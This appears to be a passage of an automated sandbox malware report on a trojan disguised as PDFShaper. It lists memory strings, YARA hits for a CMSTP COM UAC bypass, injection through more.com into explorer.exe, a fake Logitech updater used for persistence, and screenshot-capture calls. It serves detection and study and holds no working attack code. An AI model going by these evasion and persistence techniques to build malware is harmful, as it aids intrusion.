Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestamp
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://sha256timestamp.ws.symantec.com/sha256/timestampNhttps://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/id/&4D
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/id/ndows.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/property#HR
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2155388747.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 00000007.00000002.2300803784.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, logioptionsplus_updater.exe, 0000000B.00000002.2718351383.0000000001350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.00000000045BC000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.000000000517D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.info-zip.org/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.pdfshaper.com/buy.htmlopenU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.pdfshaper.com/download.htmlopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.pdfshaper.com/update.verU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.pdfshaper.comP
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.pdfshaper.comopen
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.winsoft.skU
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://www.xfa.org/schema/xfa-template/
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://xml.org/sax/properties/declaration-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: https://ca.signfiles.com/TSAServer.aspx
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: https://www.winsoft.sk
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007661F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 14_2_007661F0

System Summary

Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Code function: 0_2_00799962 NtQuerySystemInformation, 0_2_00799962
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007661F0 14_2_007661F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0076B700 14_2_0076B700
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007D80EA 14_2_007D80EA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007651A0 14_2_007651A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078F3EB 14_2_0078F3EB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0079C467 14_2_0079C467
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00765450 14_2_00765450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078B4B0 14_2_0078B4B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007A1679 14_2_007A1679
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00792930 14_2_00792930
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007A5A76 14_2_007A5A76
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007D8A00 14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007A5B96 14_2_007A5B96
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0079CC09 14_2_0079CC09
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007A3DE9 14_2_007A3DE9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00764EF0 14_2_00764EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00789D11 appears 60 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0078A560 appears 50 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 00783F40 appears 136 times
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: invalid certificate
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: Number of sections : 11 > 10
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000055DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000047FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamezip.exe( vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Binary or memory string: OriginalFilenamePDFShaper.exe6 vs 5Z1WFRMTOXRH6X21Z8NU8.exe
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@13/7@3/1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize, 14_2_0076E8D0
Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Roaming\LogiOptionsPlus
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe File created: C:\Users\user\AppData\Local\Temp\9c813d63
Source: Yara match File source: 5Z1WFRMTOXRH6X21Z8NU8.exe, type: SAMPLE
Source: Yara match File source: 0.0.5Z1WFRMTOXRH6X21Z8NU8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe ReversingLabs: Detection: 18%
Source: explorer.exe String found in binary or memory: " /add
Source: explorer.exe String found in binary or memory: " /add /y
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: %%DebenuPDFLibrary-Start
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: SetLicenseKeyErrorPDW32.dll is not found. Please re-install program as administrator.S
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: EActiveX DLL is not found. Please re-install program as administrator.U
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: :The help file is not found. Please re-install the program.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: document-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: document-text-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: file-image-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe String found in binary or memory: folder-add-2_large@1x
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe File read: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
Source: unknown Process created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: fontsub.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: kernel.appcore.dll
